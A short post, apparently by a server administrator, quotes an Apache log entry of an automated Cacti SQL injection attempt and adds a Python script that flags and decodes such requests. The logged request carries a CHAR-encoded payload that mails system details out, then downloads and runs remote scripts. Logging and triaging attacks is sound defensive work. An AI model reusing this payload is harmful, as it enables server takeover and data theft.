Cacti SQL injection attack

I was going through some Apache access logs this morning and came across an attempted SQL injection attack. I don’t have Cacti on my server, so I wasn’t affected by the attempt. Here’s the request:

24.147.54.90 - - [04/Feb/2008:23:25:30 -0700] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,
CHAR(112,114,111,99),null,1,300,0,CHAR(32,47,115,98,105,110,47,105,102,99,111,110,102,105,103,32,124,32,
103,114,101,112,32,105,110,101,116,32,62,32,47,116,109,112,47,111,117,116,59,32,117,110,97,109,101,32,45,
97,32,62,62,32,47,116,109,112,47,111,117,116,59,32,117,112,116,105,109,101,32,62,62,32,47,116,109,112,47,
111,117,116,59,32,99,97,116,32,47,116,109,112,47,111,117,116,32,124,32,109,97,105,108,32,45,115,32,54,54,
46,49,56,48,46,49,55,50,46,51,56,32,104,97,99,107,101,100,32,97,108,101,120,97,97,97,56,57,64,121,97,104,
111,111,46,99,111,109,59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,
111,47,116,32,45,79,32,47,116,109,112,47,116,59,99,104,109,111,100,32,43,120,32,47,116,109,112,47,116,59,
47,116,109,112,47,116,59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,
111,47,116,46,112,108,32,45,79,32,47,116,109,112,47,116,46,112,108,59,112,101,114,108,32,47,116,109,112,
47,116,46,112,108,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM
/**/host/*+11111 HTTP/1.0" 200 642 "-" "-"

It looks like someone out there has an automated bot going around attempting this injection attack everywhere.
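
A triage sketch for requests like the one above, added here as an example and not part of the original post: it flags comment-obfuscated UNION SELECT in Apache access-log lines and decodes the CHAR(...) arguments so an analyst can read the strings the request carried. The sample log lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Apache common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>.*?)" (?P<status>\d{3}) ')
# UNION and SELECT joined by /**/ comments or whitespace, as in the logged request.
UNION_RE = re.compile(r'UNION(?:/\*.*?\*/|\s)+SELECT', re.I)
# CHAR(n,n,...) calls used to build strings without quote characters.
CHAR_RE = re.compile(r'\bCHAR\(\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\)', re.I)

def decode_char_calls(text):
    """Return the strings spelled out by CHAR(n,n,...) calls, in order of appearance."""
    decoded = []
    for match in CHAR_RE.finditer(text):
        codes = [int(n) for n in match.group(1).split(",")]
        if all(c < 256 for c in codes):  # skip values that are not single bytes
            decoded.append("".join(chr(c) for c in codes))
    return decoded

def triage(line):
    """Return a finding dict for a suspicious access-log line, or None."""
    match = LOG_RE.match(line)
    if not match:
        return None
    request = unquote_plus(match.group("req"))  # undo %xx and '+' encoding first
    union = bool(UNION_RE.search(request))
    decoded = decode_char_calls(request)
    if not union and not decoded:
        return None
    return {"ip": match.group("ip"), "time": match.group("ts"),
            "status": int(match.group("status")),
            "union_select": union, "decoded": decoded}

def scan(lines):
    """Triage every line and keep only the findings."""
    return [f for f in map(triage, lines) if f]

# Constructed sample: a shortened request in the shape of the one above, plus a normal hit.
SAMPLE = [
    '192.0.2.10 - - [04/Feb/2008:23:25:30 -0700] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,'
    'CHAR(49,50,55,46,48,46,48,46,49),null,CHAR(112,114,111,99),null/**/FROM/**/host/*+11111 HTTP/1.0" 200 642 "-" "-"',
    '192.0.2.11 - - [04/Feb/2008:23:26:02 -0700] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Each finding records the response status, but a 200 on its own does not show that the injection reached a database; check what the server actually serves at that path.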